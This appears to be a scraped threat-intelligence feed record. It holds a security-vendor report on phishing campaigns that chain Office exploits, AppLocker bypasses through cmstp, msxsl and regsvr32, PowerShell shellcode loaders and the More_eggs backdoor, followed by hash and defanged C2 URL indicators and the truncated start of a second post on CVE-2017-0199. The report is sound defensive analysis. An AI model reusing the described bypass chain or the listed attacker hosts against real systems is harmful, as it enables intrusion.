[CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) and [CVE-2018-8174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174>). The final payload is a JScript backdoor also known as [More_eggs](<https://www.bleepingcomputer.com/news/security/a-hacking-group-is-already-exploiting-the-office-equation-editor-bug/>) that allows the attacker to control the affected system remotely. \n \n[](<https://2.bp.blogspot.com/-WZrxyxdxJK8/W179NLzmb-I/AAAAAAAAAJc/v49_XOG8JGwiA3Yzxbr9TFkjhACWCGxJACLcBGAs/s1600/image5.png>) \n\n\nObserved email campaign 1\n\n \nThe second campaign, sent on June 19, appears to be sharing threat intelligence information with the recipient, and the sender seems to be from a newly registered domain that looks like a domain belonging to a major manufacturer of ATMs and other payment systems. This campaign contains a URL, which points to a malicious Word document where the infection chain is triggered by the user allowing the VBA macro code to run. \n \n[](<https://4.bp.blogspot.com/-BfQowt5tM-A/W179Y_LBf4I/AAAAAAAAAJg/go6Wy_T0pjE6NDk_KY7eS3KyFrU5DaJDgCLcBGAs/s1600/image21.png>) \n\n\nObserved email campaign 2\n\n \nThe third campaign, sent on July 10, is a more personal campaign that targets a variety of businesses. The subject indicates that this is a complaint about problems with services provided by the target company, allegedly listed in an attached document. The attachment is an RTF document containing exploits that start the chain of several infection stages until the final executable payload is downloaded and loaded in the memory of the infected system. All emails lead to stage 1 of the attack chain. \n \n[](<https://4.bp.blogspot.com/-tCGYTSUl5uE/W179gupymPI/AAAAAAAAAJo/-LUCOwM2Nn0j_KZTYdL_EsWdOjMNCLGrACLcBGAs/s1600/image20.png>) \n\n\nObserved email campaign 3\n\n \n\n\n### Stage 1\n\n \n\n\n#### Document attacks (PDFs, RTFs, DOCs)\n\n \nMost commonly, the observed emails have a malicious RTF file as an attachment, but the attachments can also be Word documents with obfuscated VBA macro code, PDF files that redirect to other documents, or even outright binary executable payloads. \n \nHere, we show an example of a PDF campaign as seen from the point of view of the affected user. The user receives an email with a PDF attachment and opens a file that does not contain any exploit code, but relies on the social engineering techniques used in the email, which should convince the user to open the attachment without suspecting that there may be something wrong with it. \n \n[](<https://4.bp.blogspot.com/-mJZZirJV2G4/W179qMc6W4I/AAAAAAAAAJw/ZiZCPCiXPtIzqdco5ZNiUzria6y5pfXPgCLcBGAs/s1600/image10.png>) \n\n\nThis malicious PDF only contains a URL to entice the user to view the file.\n\n \nIf the user chooses to click on the URL link and to read the actual content of the file, the browser will open a legitimate Google location which will redirect the browser to a malicious document. \n \n[](<https://3.bp.blogspot.com/-CSBee5YMBZA/W179wJhZKeI/AAAAAAAAAJ0/oCN7dfQgw-cAQK3yQ8EZ6kab8jL3tG49ACLcBGAs/s1600/image2.png>) \n\n\nBrowser redirection\n\n \nFinally, the malicious Word document is opened and the VBA macro code is run after the user allows for the editing of the content within Word. This eventually kickstarts the rest of the infection chain, terminates the Word process to hide the original file and opens a new Word instance to display a non-malicious decoy document dropped to the disk drive by one of the previous stages. \n \n[](<https://2.bp.blogspot.com/-E2ABQdUTw_0/W1793OHj0gI/AAAAAAAAAJ8/WUap2R_rvFQaYJPsTf3cYF6cC_7bMC7yQCLcBGAs/s1600/image15.png>) \n\n\nMalicious Word document\n\n \nThe decoy document remains constant throughout the campaign and is likely a side effect of the Threadkit exploit toolkit and cannot be relied upon for attribution. \n \n[](<https://2.bp.blogspot.com/-_9NXN6xYfAw/W17-CInf82I/AAAAAAAAAKI/M3tBYyGnYBwe_NowkyHyriQsxVdElutDQCLcBGAs/s1600/image6.png>) \n\n\nDecoy document opened in Word\n\n \n\n\n#### Stage 2 \u2014 Exploits and exploit kits\n\nRTF documents sent in the observed campaigns contain exploits for several vulnerabilities in Microsoft Office, and they seem to be created using a version of an exploit toolkit, often referred to as [Threadkit](<https://www.scmagazine.com/evolving-exploit-builder-kit-threadkit-used-for-rat-and-banking-trojan-campaigns/article/755975/>). Documents generated by the toolkit typically launch a couple of batch files, task.bat and task (2).bat that drive the rest of the infection process. \n \nThreadkit is not exclusively used by the actors behind the observed attacks but also by other groups utilizing various payloads, including Trickbot, Lokibot, SmokeLoader and some other banking malware. \n \nThe actors behind the attacks seem to be using a somewhat modified version of the exploit kit, which relies on launching code through known mechanisms for evading Windows AppLocker protection feature and leveraging legitimate Microsoft applications such as cmstp, regsvr32 or msxsl. We will discuss these mechanisms in more detail later in this post. \n \nAt least three vulnerabilities are exploited with these documents, the most common of which is a memory stack buffer overflow in Microsoft Equation Editor (CVE-2017-11882) patched by Microsoft in November 2017, followed by a composite moniker vulnerability (CVE-2017-8570), as well as the very similar, but slightly older, script moniker vulnerability that is very popular among attackers (CVE-2017-0199). \n \nMore recent attacks also attempted to exploit an Internet Explorer vulnerability (CVE-2018-8174) triggered by an RTF document and an embedded URL moniker object. The embedded object triggers a download of an HTML page containing the VBScript that exploits the vulnerability and launches the shellcode. The HTML component of the exploit is based on the [original exploit code](<https://github.com/0x09AL/CVE-2018-8174-msf/blob/master/CVE-2018-8174.rb>) discovered in May this year. \n \n[](<https://3.bp.blogspot.com/-VQElnaC_rFk/W17-HJYF24I/AAAAAAAAAKQ/UuzjsRpWFC0FjprY1D4IKnxCRzZVeOOCACLcBGAs/s1600/image11.png>) \n\n\nCVE-2018-8174 VB script exploit code\n\n \n\n\n### Stage 3 \u2014 Scriptlets, scripts and DLLs\n\n#### AppLocker bypass attempts (cmstp, msxsl, regsvr32)\n\nWhen Microsoft decided to add the [AppLocker](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/applocker-overview>) feature to Windows to allow defenders to implement holistic protection application control, security researchers began working on the offensive side of security to search for ways to circumvent it. \n \nWindows AppLocker allows administrators to control which executable files are denied or authorized to execute. Administrators can create rules based on file names, publishers or file location that will allow only certain files to execute, but not others. \n \nAppLocker works well for executables and over time it has also been improved to control various script types, including JScript, PowerShell and VBScript. This has significantly reduced the attack surface and forced attackers, including more sophisticated groups, to find new methods of launching executable code. \n \nA number of legitimate Windows executables that are not blocked by the default AppLocker policies has been discovered and various proof of concept AppLocker bypass code became publicly available. \n \nNotable applications used in these attacks are cmstp and msxsl. The Microsoft Connection Manager Profile Installer (cmstp.exe) is a command-line program used to install Connection Manager service profiles. Cmstp accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. A malicious INF file can be supplied as a parameter to download and execute remote code. \n \n[](<https://1.bp.blogspot.com/-01dBXdNmHi0/W17-MyfaB3I/AAAAAAAAAKU/dTxSt_4XCxk1ZEsDth4hMNFrXtSIuCO1gCLcBGAs/s1600/image13.png>) \n\n\nExample malicious INF file to load a remote SCT file\n\n \nCmstp may also be used to load and execute COM scriptlets (SCT files) from remote servers. \n \n[](<https://4.bp.blogspot.com/-t1kB4rHAG50/W17-TdNqoSI/AAAAAAAAAKc/qrPydgygPsg-1qur8hMEWQTw30zBkFf5ACLcBGAs/s1600/image14.png>) \n\n\nExample of malicious scriptlet file used to drop a malicious DLL dropper for the next stage\n\n \n \n \nMicrosoft allows developers to create COM+ objects in script code stored in an XML document, a so-called scriptlet file. Although it is common to use JScript or VBScript, as they are available in Windows by default, a scriptlet can contain COM+ objects implemented in other languages, including Perl and Python, which would be fully functional if the respective interpreters are installed. \n \nTo bypass AppLocker and launching script code within a scriptlet, the attacker includes the malicious code within an XML script tag placed within the registration tag of the scriptlet file and calls cmstp with appropriate parameters. For example: \n \n[](<https://1.bp.blogspot.com/--GAX77Bz0uo/W17-aMAryqI/AAAAAAAAAKk/vpAxkKo_9XEOZRx-PFDRzS_HHsozvDa0QCLcBGAs/s1600/image23.png>) \n \nHere, the attackers randomize the scriptlet name and use a .txt filename extension, likely in an attempt to bypass fundamental protection mechanisms that attempt to block file types based on the filename extension. \n \n[](<https://1.bp.blogspot.com/--4T8-32yVdQ/W17-fzh7IOI/AAAAAAAAAKs/EByqWQZY6gM9tuf2bCrd3olMJKDv82miwCLcBGAs/s1600/image22.png>) \n\n\nPayload dropper in an XSL file\n\n \nAnother executable used to attempt bypass of the AppLocker feature is msxsl.exe, a Windows utility used to run XSL (eXtensible Stylesheet Language) transformations. Msxsl.exe is dropped together with its parameter by the previous attack stage, a DLL dropper, and run to continue the infection chain. \n \nIt takes an XML and an XSL file as a parameter, but it also loads the script engine and runs the script code within the &lt;msxsl:script&gt; tag of the supplied XSL file when invoked through a call placed within the &lt;xsl:value-of&gt; tag. \n \n[](<https://4.bp.blogspot.com/-yWOLoSU6LRA/W17-ktBBuiI/AAAAAAAAAK0/IlHWY7YeMDQoJy1xN7jZH0YjGnpMJ2uAwCLcBGAs/s1600/image19.png>) \n\n\nInvoking the JScript code of the payload dropper within an XSL file\n\n \nThe supplied XML file seems to be randomly generated and used simply because the second parameter is required and is of no further interest for analysis. \n \n\n\n#### DLL dropper\n\n \nAn earlier part of the second stage is implemented as an encrypted JScript scriptlet which eventually drops a randomly named COM server DLL binary with a .txt filename extension, for example, 9242.txt, in the user's home folder and registers the server using the regsvr32.exe utility. \n \nThe dropper contains an encrypted data blob that is decrypted and written to the disk. The dropper then launches the next stage of the attack by starting PowerShell, msxsl or cmstp.exe as described above. \n \nOnce the DLL dropper is finished with its activity, it will be deleted from the drive, which may be one of the reasons why there are not too many DLL dropper samples available in public malware repositories. \n \n[](<https://4.bp.blogspot.com/-FUssIdEGZ74/W17-pu7gUyI/AAAAAAAAAK8/yjmsM4PjLyQCDK0FSM-5uhDZl4YB0mSowCLcBGAs/s1600/image8.png>) \n\n\nExported functions of the two observed variations of the dropper DLLs\n\n \nFrom the observed samples, it seems that the attacker has access to the source code of two legitimate DLLs which they modify to include the malicious dropper code. They can be distinguished by looking at the names of the exported functions. The exported names seem legitimate and should not be used as a basis for the malware detection. \n \n\n\n### Stage 4 \u2014 Downloaders\n\n#### PowerShell leading to shellcode\n\nThe PowerShell chain is launched from an obfuscated JScript scriptlet previously downloaded from the command and control (C2) server and launched using cmstp.exe. \n \n[](<https://4.bp.blogspot.com/-6bulFpmOTNc/W17-vzD3EEI/AAAAAAAAALE/8wC16ghptEgkgQBIwUgfF6Wgy8Zk9pHMwCLcBGAs/s1600/image12.png>) \n\n\nFirst PowerShell stage with base64 encoded code\n\n \nThe first PowerShell stage is a simple downloader that downloads the next PowerShell stage and launches a child instance of powershell.exe using the downloaded, randomly named script as the argument. \n \n[](<https://4.bp.blogspot.com/-gmVjHvVlq64/W17-1TotPXI/AAAAAAAAALM/Y6g2lhH0pK4iGMfrTSkWwy4_8hU7ibg9ACLcBGAs/s1600/image1.png>) \n\n\nPowerShell downloader\n\n \nThe downloaded PowerShell script code is obfuscated in several layers before the last layer is reached. The last layer loads shellcode into memory and creates a thread within the PowerShell interpreter process space. \n \n[](<https://2.bp.blogspot.com/-gPIxAH_xinM/W17-7FlPf9I/AAAAAAAAALU/V26lJXD_VX8kH0eIdoRdXGmzbr2329clQCLcBGAs/s1600/image18.png>) \n\n\nPowerShell stage shellcode loader\n\n \nThis PowerShell code used in the final stage to launch shellcode is publicly available as a part of an open-source antivirus evasion framework DKMC (Don't Kill My Cat) released in 2016, but it is [also connected](<http://www.offensiveops.io/tools/cobalt-strike-bypassing-windows-defender-with-obfuscation/>) with the [Cobalt Strike framework](<https://www.cobaltstrike.com/>). \n \n[](<https://1.bp.blogspot.com/-EHVISptWDJo/W17_B4Fv7VI/AAAAAAAAALc/mlBaervlqIcozc2Y-nuggcORAWmFFqw6wCLcBGAs/s1600/image4.png>) \n\n\nBeginning of the \"download and load\" shellcode\n\n \nThe shellcode is relatively simple and begins with a XOR loop that deobfuscates the rest of the code. The most important function is the one that resolves the various API addresses using a checksum of the API name as the parameter, traverses the PEB linked list of loaded modules to find the required module, traverses the list of module exports to find the required API and finally jumps (calls) the found API function. The main purpose of the shellcode is to download an encrypted payload over HTTPS, decrypt it in memory and launch it. \n \n\n\n#### JScript downloader\n\nAs opposed to PowerShell loading a Cobalt Strike beacon, the other observed infection chain continues using JScript to deliver the final payload, which is a JScript backdoor. In this infection chain, the DLL dropper drops a JScript downloader, which eventually downloads the JScript backdoor payload from the C2 server. \n \n[](<https://4.bp.blogspot.com/-9z1ezb5Nd6g/W17_HTR8_cI/AAAAAAAAALg/55IwR3pU-IkQRtO3rXk7QrfjCcXfX_opACLcBGAs/s1600/image3.png>) \n\n\nJScript downloader which downloads and launches a randomly named backdoor\n\n \nThe final payload is another obfuscated scriptlet file that is started by launching regsvr32.exe with the /U (unregister) command-line option to call into scrobj.dll JScript interpreter with the downloaded scriptlet file as an argument. \n \n\n\n### Stage 5 \u2014 Payloads\n\n#### JScript backdoor\n\n \nIn the JScript side of the observed campaign's infection chain, the final payload is a fully functional JScript backdoor known as \"More_eggs,\" based on one of the variable names present in its code. \n \nThe functionality of the backdoor is somewhat typical for that type of malware and allows the attacker to control the infected machine over an HTTPS-based C2 protocol. The backdoor has its initial gate that it connects to on a regular basis to check for the next commands submitted by the attacker. \n \nThe commands are relatively limited, but are sufficient enough to instruct the backdoor to download and execute a new payload, remove itself from the system or download and launch additional scriptlets. During the research, we have not observed other binary payloads downloaded by the JScript backdoor but they are likely to be present in a real environment. \n \nLooking at our Umbrella Investigate telemetry, there was a low level of activity for most of the C2 servers. However, for one of them, api.outlook.kz, we observed a regular pattern of moderate usage over the period of a few weeks with the majority of the queries coming from U.S., followed by Germany and Turkey. \n \n[](<https://2.bp.blogspot.com/-payTYwnje7Y/W17_OaKZBRI/AAAAAAAAALk/dHlE7frKrKguIgLsPP1ouklSg8-e4Bz9QCLcBGAs/s1600/image16.png>) \n\n\nDNS queries for api.outlook.kz backdoor C2 host\n\n \nThe backdoor fingerprints the targeted system and sends back the acquired information, including an installed anti-malware program, a version of the installed operating system, the local IP address, the name of the infected computer, the username and other characteristics that uniquely describe the infected system. \n \n[](<https://4.bp.blogspot.com/-ti5Akdwucxo/W17_T_uiPSI/AAAAAAAAALs/WFgiTTIsseQn1I_AgIorhcIOC_i0ECwpACLcBGAs/s1600/image7.png>) \n\n\nTwo More_eggs backdoor versions, possibly two different groups?\n\n \nThere are definite similarities between these attacks \u2014 primarily in the type of exploit, but also in the C2 infrastructure and the kind of payload that is used. However, that doesn't mean it can be attributed to a single actor. \n \nThere are at least two different versions of the JScript backdoor used, version 2.0 and version 4.4. Interestingly, if an attack used version 4.4, the attackers decided to add a variable \"researchers\" initialized to the string \"We are not cobalt gang, stop associating us with such skids!\", which may indicate that there is a more than one actor using very similar TTPs being active during the same period. \n \n\n\n#### Cobalt Strike beacon\n\n \nOn the PowerShell side of the infection chain, the downloaded final payload is a Cobalt Strike beacon, which provides the attacker with rich backdoor functionality. \n \nCobalt Strike beacons can be compared with Meterpreter, a part of the Metasploit framework. Cobalt Strike is used by penetration testers and offensive security researchers when delivering their services, but it is generally, just as Meterpreter, detected by anti-malware software as it can be easily used by malicious actors. \n \nThe beacon payload allows attackers to maintain full control over the infected system and pivot to other systems as they see required, harvest user credentials, execute code with a UAC bypass, escalate the beacon privileges using different mechanisms, and so on. An in-depth analysis of a Cobalt Strike beacon payload is outside of the scope of this post. \n \n\n\n### Conclusion/Summary\n\n \n\n\n[](<https://3.bp.blogspot.com/-LOlYsj4fYlc/W17_auF7x3I/AAAAAAAAALw/DHPn4Y-234AnXZwfcYHgHy5lkX-ZO1howCLcBGAs/s1600/image17.jpg>)\n\nBreadth of the observed campaigns\n\n \nAttackers have to create a reliable and adaptable infrastructure to be able to continually launch attacks over an extended period of time. This sometimes requires the development of proprietary tools with the advantage of full control over them, but with a higher initial cost of investment. \n \nOn the other hand, attackers can choose off-the-shelf tools such as the ones described, which can serve their purposes equally well if they are disguised. \n \nWe have documented the activities of several related malware campaigns targeting users in the financial industry, as well as other businesses, with a potential for financial return. We choose to cover these campaigns to showcase the breadth of TTPs required for successful targeted attacks, ranging from proper reconnaissance all the way to delivery of the final payload through several intermediate infection stages. \n \nThe TTPs we observed over the past two months are consistent with the previous activity of the so-called Cobalt Group. \n \nHowever, we have found some payloads that contain a message for researchers stating that the attackers are not the Cobalt group, which may indicate that the attacks are conducted by different actors despite the commonalities in TTPs. \n \nAlthough the attacks are conducted using readily made tools, the attackers show a high level of technical knowledge judging by their ability to combine those tools into a number of successful campaigns delivering different payloads to gain an initial foothold into their targets and provide attackers with a platform for further attack stages to reach their ultimate goal, which is likely a financial gain. \n \n\n\n### Coverage\n\n \nAdditional ways our customers can detect and block this threat are listed below. \n \n\n\n[](<https://4.bp.blogspot.com/-_H0ODecG0RQ/W17_kFfhdfI/AAAAAAAAAL4/grFyyVRTKhUNxWganFRyJDucbw2iw2mGgCLcBGAs/s1600/image9.png>)\n\n \n \nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Secuirty ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ ](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)[Web Security Alliance (](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)[WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web-scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ ](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[Next-Generation Firewall (](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)[NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ ](<https://meraki.cisco.com/products/appliances>)[Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and builds protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n \n \n \n\n\n### IOCs\n\n \n\n\n#### RTFs\n\naf9ed7de1d9d9d38ee12ea2d3c62ab01a79c6f4b241c02110bac8a53ea9798b5 \ne4081eb7f47d76c57bbbe36456eaa4108f488ead5022630ad9b383e84129ffa9 \nbebd4cd9aece49fbe6e7024e239638004358ff87d02f9bd4328993409da9e17c \n7762bfb2c3251aea23fb0553dabb13db730a7e3fc95856d8b7a276000b9be1f5 \na1f3388314c4abd7b1d3ad2aeb863c9c40a56bf438c7a2b71cbcff384d7e7ded \ndc448907dd8d46bad0e996e7d23dd35ebe04873bc4bb7a8d26feaa47d09d1eab \ncbbf2de2fbd4bce3f9a6c7c2a3efd97c729ec506c654ce89cd187d7051717289 \n40f97cf37c136209a65d5582963a72352509eb802da7f1f5b4478a0d9e0817e8 \n \n\n\n#### DOC(x)s\n\ne566db9e491fda7a5d28ffe9019be64b4d9bc75014bbe189a9dcb9d987856558 \n9ddc22718945ac8e29748999d64594c368e20efefc4917d36fead8a9a8151366 \n1247e1586a58b3be116d83c62397c9a16ccc8c943967e20d1d504b14a596157c \n \n\n\n#### Dropper DLLs\n\ncc2e9c6d8bce799829351bd25a64c9b332958038365195e054411b136be61a4f \n0fef1863af0d7da7ddcfd3727f8fa08d66cd2d9ab4d5300dd3c57e908144edb6 \n74af98fb016bf3adb51f49dff0a88c27bf4437e625a0c7557215a618a7b469a1 \n844f56b5005946ebc83133b885c89e74bc4985bc3606d3e7a342a6ca9fa1cc0e \n \n\n\n#### Scriptlets\n\n283f733d308fe325a0703af9857f59212e436f35fb6063a1b69877613936fc08 \nafeabc34e3260f1a1c03988a3eac494cc403a88711c2391ea3381a500e424940 \n3b73ebb834282ae3ffcaeb3c3384fd4a721d78fff5e7f1d5fd63a9c244d84c48 \n4afba1aa6b58dc3754fe2ff20c0c23ce6371ba89094827fe83bb994329fa16a3 \n \n\n\n#### PDFs\n\n5ac1612535b6981259cfac95efe84c5608cf51e3a49b9c1e00c5d374f90d10b2 \n9d6fd7239e1baac696c001cabedfeb72cf0c26991831819c3124a0a726e8fe23 \ndf18e997a2f755159f0753c4e69a45764f746657b782f6d3c878afb8befe2b69 \n \n\n\n#### Decoy document\n\nf1004c0d6bf312ed8696c364d94bf6e63a907c80348ebf257ceae8ed5340536b \n \n\n\n#### Executable payloads\n\nf266070d4fe999eae02319cb42808ec0e0306125beda92f68e0b59b9f5bcac5a \nfc004992ad317eb97d977bd7139dbcc4f11c4447a26703d931df33e72fd96db3 \n \n\n\n#### URLs - docs\n\nhxxp(s)://swift-fraud[.]com/documents \nhxxp://95[.]142[.]39[.]109/e1.txt \nhxxps://kaspersky-security[.]com/Complaint.doc \nhxxps://mcafeecloud[.]us/complaints/67972318.doc \nhxxps://s3[.]sovereigncars[.]org[.]uk/inv005189.pdf \n \n\n\n#### URLs - JS backdoor\n\n##### Stage 1 - drop DLL dropper\n\nhxxp://nl.web-cdn.kz \nhxxp://mail[.]halcyonih[.]com/m.txt \nhxxp://mail[.]halcyonih[.]com/humans.txt \nhxxp://secure[.]n-document[.]biz/humans.txt \nhxxp://xstorage[.]biz/robots.txt \nhxxp://cloud[.]yourdocument[.]biz/robots.txt \nhxxp://cloud-direct[.]biz/robots.txt \nhxxp(s)://documents[.]total-cloud[.]biz/version.txt \nhxxp://cloud[.]pallets32[.]com/robots.txt \nhxxp://document[.]cdn-one[.]biz/robots.txt \n \n\n\n##### Backdoor C2\n\nhxxps://api[.]outlook[.]kz \nhxxp://api[.]fujitsu[.]org[.]kz \nhxxp://api[.]asus[.]org[.]kz \nhxxp://api[.]toshiba[.]org[.]kz \nhxxp://api[.]miria[.]kz \nhxxp(s)://outlook[.]live[.]org[.]kz \n \n\n\n#### Powershell Stage\n\nhxxp://95[.]142[.]39[.]109/driver \nhxxp://95[.]142[.]39[.]109/wdriver \n \n\n\n#### Decoy document\n\nhxxp://95[.]142[.]39[.]109/document.doc \n \n\n\n#### Cobalt Strike beacon stage\n\nhxxps://95[.]142[.]39[.]109/vFGY\n\n", "cvss3": {}, "published": "2018-07-31T09:38:00", "type": "talosblog", "title": "Multiple Cobalt Personality Disorder", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-8174"], "modified": "2018-08-01T07:09:30", "id": "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/PZ9apzQhMfA/multiple-cobalt-personality-disorder.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-14T18:08:43", "description": "<h3 id=\"h.o562lfhybzl7\">Introduction</h3><br />Since public disclosure in April 2017, <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199\">CVE-2017-0199</a> has been frequently used within malicious Office documents. The vulnerability allows attackers to include Ole2Link objects within RTF documents to launch remote code when HTA applications are opened and parsed by Microsoft Word.<br /><br />In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158\">CVE-2012-0158</a>, possibly in an attempt to evade user prompts by Word, or to arrive at code execution via a different mechanism. Potentially, this was just a test run in order to test a new concept. In any case, the attackers made mistakes which caused the attack to be a lot less effective than it could have been.<br /><br />Analysis of the payload highlights the potential for the Ole2Link exploit to launch other document types, and also demonstrates a lack of rigorous testing procedures by at least one threat actor.<br /><br /> Attackers are obviously trying to find a way around known warning mechanisms alerting users about potential security issues with opened documents. In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain and fails.<br /> <br /> Although this attack was unsuccessful it has shown a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. It may have been an experiment that didn\u2019t quite work out, or it may be indication of future attacks yet to materialise.<br /> <a name='more'></a><br /><br /><h3 id=\"h.8er5iyy5kysj\">Standard CVE-2017-0199 exploitation</h3><div><br /></div>A typical attack exploiting CVE-2017-0199 consists of an email campaign, distributing a malicious RTF document.The vulnerability exists in code that handles Ole2Link embedded objects. Including an Ole2Link in an RTF document allows Word to load other, remote documents within the context of Word.<br /><br /><a href=\"https://1.bp.blogspot.com/-NSSI8BOL22s/WZGK-IAegfI/AAAAAAAAAEs/xw2tx8KHcYslKPmxKeenFiTpokqXf82GwCLcBGAs/s1600/image3.png\" imageanchor=\"1\"><img border=\"0\" data-original-height=\"405\" data-original-width=\"720\" height=\"360\" src=\"https://1.bp.blogspot.com/-NSSI8BOL22s/WZGK-IAegfI/AAAAAAAAAEs/xw2tx8KHcYslKPmxKeenFiTpokqXf82GwCLcBGAs/s640/image3.png\" width=\"640\" /></a> <br /><div style=\"text-align: center;\">Standard CVE-2017-0199 flow</div><br />If the remote OLE2Link points to an HTML application file (HTA file type), vulnerable Word and WordPad versions will parse and execute the application even if the user chooses not to allow inclusion of the remote content. A possible sign of exploitation attempt of CVE-2017-0199 is this Word prompt to the user:<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-0VKBqAUUxXM/WZGL-PIwozI/AAAAAAAAAE4/VF47zZTXA1YZRAVvsArdqLXcIPFgd9l_gCLcBGAs/s1600/image13.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"309\" data-original-width=\"1438\" height=\"138\" src=\"https://2.bp.blogspot.com/-0VKBqAUUxXM/WZGL-PIwozI/AAAAAAAAAE4/VF47zZTXA1YZRAVvsArdqLXcIPFgd9l_gCLcBGAs/s640/image13.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Word prompt displayed to the user before potential CVE-2017-0199 exploit attempt</div><div style=\"text-align: center;\"><br /></div><h3 id=\"h.roxzrd10uaho\">Modified CVE-2017-0199 flow</h3><br />In the case of the modified exploit flow we analyzed, the attack started with an email message containing a malicious attachment. The email employed the usual social engineering tricks to entice the user to open and read the attached document. Referring to the attachment as a purchase order coming from an unknown \"partner\" is a very common social engineering trick of spammed malware. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-Hw3wXiGOBh8/WZGMKf_qe7I/AAAAAAAAAE8/SyyOcUTNsyETwGzn-JB5K07vMiWb_g8NwCLcBGAs/s1600/image6.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"461\" data-original-width=\"1049\" height=\"280\" src=\"https://3.bp.blogspot.com/-Hw3wXiGOBh8/WZGMKf_qe7I/AAAAAAAAAE8/SyyOcUTNsyETwGzn-JB5K07vMiWb_g8NwCLcBGAs/s640/image6.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Email message launching the modified attack</div><div style=\"text-align: center;\"><br /></div>The document attached to the email message is an RTF file including an Ole2Link to a remote document hosted at hxxp://multplelabs [dot] com/ema/order.doc. In this case, the mime content type of the remote document observed in the packet capture of the attack was not the expected application/hta but rather application/msword which was enough to motivate us to dig a little bit deeper in order to find out what the attackers are trying to achieve. <br /><br />The first surprising thing is that the vulnerable version of Word I used for the analysis crashed before it managed to display the prompt commonly seen with CVE-2017-0199 exploitation. Instead of displaying the prompt, Word started to convert the downloaded document and then hung before eventually crashing with a memory access fault. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-HbxzsVEz4ao/WZGMUkypjfI/AAAAAAAAAFA/rDvvv35sIBQ36bARwkAXWqgXohpFwTtfgCLcBGAs/s1600/image4.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"500\" data-original-width=\"1600\" height=\"200\" src=\"https://4.bp.blogspot.com/-HbxzsVEz4ao/WZGMUkypjfI/AAAAAAAAAFA/rDvvv35sIBQ36bARwkAXWqgXohpFwTtfgCLcBGAs/s640/image4.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Word crashes without the prompt</div><br />The crash was caused not by the first exploit stage using CVE-2017-0199 but rather by the second stage using CVE-2012-0158. Here we see the shellcode embedded into a MSComctlLib.ListViewCtrl.2 ActiveX control, which is a telltale sign of CVE-2012-0158. The shellcode starts with a ROP chain followed by the shellcode which starts executing when the vulnerability is triggered. After the ROP chain sets the right permissions for the memory block containing the rest of the shellcode, the first stage of the shellcode is executed. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-pN1c55UKgmM/WZGMmdWIsPI/AAAAAAAAAFE/1-35-nnX3-QAgbUs5LrtWIQ0A8egO_UxwCLcBGAs/s1600/image5.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"330\" data-original-width=\"1600\" height=\"132\" src=\"https://2.bp.blogspot.com/-pN1c55UKgmM/WZGMmdWIsPI/AAAAAAAAAFE/1-35-nnX3-QAgbUs5LrtWIQ0A8egO_UxwCLcBGAs/s640/image5.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">First stage shellcode for 